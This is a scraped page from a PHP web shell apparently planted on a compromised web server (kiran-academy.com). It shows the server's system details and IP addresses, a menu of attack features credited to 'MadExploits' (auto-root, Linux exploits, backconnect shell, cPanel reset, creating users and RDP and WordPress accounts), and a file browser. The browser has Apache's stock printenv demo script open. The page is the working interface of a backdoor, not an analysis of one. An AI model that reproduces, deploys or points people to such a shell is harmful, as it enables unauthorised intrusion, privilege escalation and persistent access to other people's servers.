Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
apache /
cgi-bin /
[ HOME SHELL ]
Name
Size
Permission
Action
printenv
820
B
-rw-r--r--
printenv.vbs
1.05
KB
-rw-r--r--
printenv.wsf
1.11
KB
-rw-r--r--
test-cgi
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printenv
# # To permit this cgi, replace # on the first line above with the # appropriate #!/path/to/perl shebang, and on Unix / Linux also # set this script executable with chmod 755. # # ***** !!! WARNING !!! ***** # This script echoes the server environment variables and therefore # leaks information - so NEVER use it in a live server environment! # It is provided only for testing purpose. # Also note that it is subject to cross site scripting attacks on # MS IE and any other browser which fails to honor RFC2616. ## ## printenv -- demo CGI program which just prints its environment ## use strict; use warnings; print "Content-type: text/plain; charset=iso-8859-1\n\n"; foreach my $var (sort(keys(%ENV))) { my $val = $ENV{$var}; $val =~ s|\n|\\n|g; $val =~ s|"|\\"|g; print "${var}=\"${val}\"\n"; }
Close